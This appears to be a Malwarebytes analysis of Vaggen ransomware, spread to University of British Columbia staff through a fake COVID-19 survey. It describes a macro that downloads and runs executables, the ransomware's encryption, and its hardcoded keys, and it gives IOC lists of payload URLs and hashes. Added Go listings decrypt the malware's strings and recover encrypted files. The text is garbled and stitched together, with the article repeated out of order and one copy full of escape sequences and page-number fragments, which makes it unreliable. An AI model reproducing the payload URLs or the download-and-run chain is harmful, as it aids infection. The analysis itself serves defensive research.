main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (such as the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded ("STALKER"). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback passed to the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here.
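Before looking at the file encryption, here is the string layer in runnable form. The Go code below is an added example written for this post; it is neither the malware's code nor the xxtea-go library, but a self-contained XXTEA implementation (Wheeler and Needham's btea) wrapped the way such libraries wrap it: Base64 on the outside, the key zero-padded to 16 bytes, data handled as little-endian 32-bit words with the plaintext length stored in a trailing word. That this layout and key padding match xxtea-go byte for byte is an assumption, and the strings encrypted here are constructed for the round trip rather than lifted from the binary. The point worth noticing is that XXTEA is unauthenticated: a wrong key does not fail cleanly, it produces garbage, and the only signal is an implausible trailing length word, which DecryptString checks for.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"errors"
)

// Added example for this post (not the malware's code, not xxtea-go). Assumed layout, shared by
// the common XXTEA libraries: key zero-padded to 16 bytes, little-endian words, length in a trailing word.

const delta = 0x9e3779b9

func fixKey(key []byte) (k [4]uint32) {
	padded := make([]byte, 16) // zero-pad (or truncate) the key to 16 bytes
	copy(padded, key)
	for i := range k {
		k[i] = binary.LittleEndian.Uint32(padded[i*4:])
	}
	return k
}

// toWords packs bytes into little-endian words; withLen appends the byte count as the last word.
func toWords(data []byte, withLen bool) []uint32 {
	v := make([]uint32, (len(data)+3)/4+1) // one spare word for the length
	for i, b := range data {
		v[i>>2] |= uint32(b) << (uint(i&3) * 8)
	}
	if withLen {
		v[len(v)-1] = uint32(len(data))
		return v
	}
	return v[:len(v)-1]
}

// fromWords unpacks words; withLen trusts the trailing length word, which a wrong key garbles.
func fromWords(v []uint32, withLen bool) ([]byte, error) {
	n := len(v) * 4
	if withLen {
		m := int(v[len(v)-1])
		if m > n-4 || m < n-7 {
			return nil, errors.New("xxtea: implausible length word (wrong key or corrupt data)")
		}
		n = m
	}
	out := make([]byte, n)
	for i := range out {
		out[i] = byte(v[i>>2] >> (uint(i&3) * 8))
	}
	return out, nil
}

// btea is Wheeler and Needham's XXTEA over a word array, in place; decrypt picks the direction.
func btea(v []uint32, k [4]uint32, decrypt bool) {
	n := uint32(len(v))
	if n < 2 {
		return
	}
	rounds := 6 + 52/n
	var y, z, sum uint32
	mx := func(e, p uint32) uint32 {
		return ((z>>5 ^ y<<2) + (y>>3 ^ z<<4)) ^ ((sum ^ y) + (k[(p&3)^e] ^ z))
	}
	if !decrypt {
		z = v[n-1]
		for ; rounds > 0; rounds-- {
			sum += delta
			e, p := (sum>>2)&3, uint32(0)
			for ; p < n-1; p++ {
				y = v[p+1]
				v[p] += mx(e, p)
				z = v[p]
			}
			y = v[0]
			v[n-1] += mx(e, p)
			z = v[n-1]
		}
		return
	}
	sum, y = rounds*delta, v[0]
	for ; rounds > 0; rounds-- {
		e, p := (sum>>2)&3, n-1
		for ; p > 0; p-- {
			z = v[p-1]
			v[p] -= mx(e, p)
			y = v[p]
		}
		z = v[n-1]
		v[0] -= mx(e, 0)
		y = v[0]
		sum -= delta
	}
}

// DecryptString undoes the malware's string protection: Base64 decode, then XXTEA with the fixed key.
func DecryptString(b64 string, key []byte) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(raw) < 4 || len(raw)%4 != 0 {
		return "", errors.New("xxtea: ciphertext is not a whole number of words")
	}
	v := toWords(raw, false)
	btea(v, fixKey(key), true)
	out, err := fromWords(v, true)
	return string(out), err
}

// EncryptString is the forward direction, used here only to construct test strings.
func EncryptString(plain string, key []byte) string {
	v := toWords([]byte(plain), true)
	btea(v, fixKey(key), false)
	raw, _ := fromWords(v, false)
	return base64.StdEncoding.EncodeToString(raw)
}
```

Feed DecryptString the Base64 chunks pulled from the binary together with the key "STALKER"; if the length check rejects them, the first things to suspect are the key padding rule and the word layout, which differ between XXTEA libraries.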
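The file encryption itself is standard AES-256-GCM, and because the key is hardcoded the recovery routine is short. The Go program below is an added example for this post (not the malware's code and not a Malwarebytes decryptor): it reproduces the described output layout of nonce, ciphertext and GCM tag so that a constructed document can be sealed and then recovered with the key named in the analysis; crypto/rand stands in for CryptGenRandom, which only matters for producing test input. GCM's authentication tag is what makes recovery safe to attempt blindly: a wrong key, a truncated file or a corrupted byte is rejected instead of producing garbage.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"strings"
)

// Added example for this post, not the malware's code and not a Malwarebytes tool.
// .VAGGEN layout per the analysis: 12-byte nonce || AES-256-GCM ciphertext || 16-byte tag.

// VaggenKey is the 32-byte key hardcoded in the binary (hence AES-256).
var VaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// SealLikeVaggen writes a blob in the described layout so the recovery path can be exercised
// without a real sample; crypto/rand stands in for the CryptGenRandom nonce.
func SealLikeVaggen(plain, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to dst, so handing it the nonce as dst yields nonce||ct||tag.
	return gcm.Seal(nonce, nonce, plain, nil), nil
}

// RecoverVaggen splits the nonce from ciphertext||tag and decrypts. GCM authenticates, so a
// wrong key, a truncated file or a flipped byte is rejected instead of producing garbage.
func RecoverVaggen(blob, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	if minLen := gcm.NonceSize() + gcm.Overhead(); len(blob) < minLen {
		return nil, fmt.Errorf("blob is %d bytes, below the %d needed for nonce and tag", len(blob), minLen)
	}
	nonce, ct := blob[:gcm.NonceSize()], blob[gcm.NonceSize():]
	return gcm.Open(nil, nonce, ct, nil)
}

// OriginalName strips the .VAGGEN extension; ok is false for files the ransomware did not touch.
func OriginalName(path string) (name string, ok bool) {
	const ext = ".VAGGEN"
	if len(path) <= len(ext) || !strings.EqualFold(path[len(path)-len(ext):], ext) {
		return path, false
	}
	return path[:len(path)-len(ext)], true
}

func main() {
	blob, err := SealLikeVaggen([]byte("Q3 budget draft, do not distribute"), VaggenKey) // constructed sample
	if err != nil {
		panic(err)
	}
	plain, err := RecoverVaggen(blob, VaggenKey)
	fmt.Printf("recovered %q (err=%v)\n", plain, err)
	_, err = RecoverVaggen(blob, []byte(strings.Repeat("0", 32)))
	fmt.Println("wrong key:", err)
	name, ok := OriginalName("report.docx.VAGGEN")
	fmt.Println(name, ok)
}
```

To recover a real file, read its bytes, call RecoverVaggen with VaggenKey, and write the result under the name OriginalName returns; skip anything that fails authentication rather than overwriting it.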
The file encryption uses a hardcoded 32-byte key and a 12-byte nonce generated by CryptGenRandom; the file content is encrypted with the gcm.Seal function.

The output file (with .VAGGEN extension) contains, in order:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart, my money". Because the key is embedded in the binary rather than generated per victim, we can easily decrypt the content with it.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It's unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 544 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 545 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 546 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 547 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 548 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 549 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 550 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 551 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 552 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 553 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 554 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam sent through file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to determine whether it succeeded (on success, the return value is the task ID of the launched application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Go library function filepath.Walk (from the path/filepath package).\r\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and a 12 byte long nonce generated by CryptGenRandom, the file content is encrypted with the help of the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 byte long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\n
polisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\n
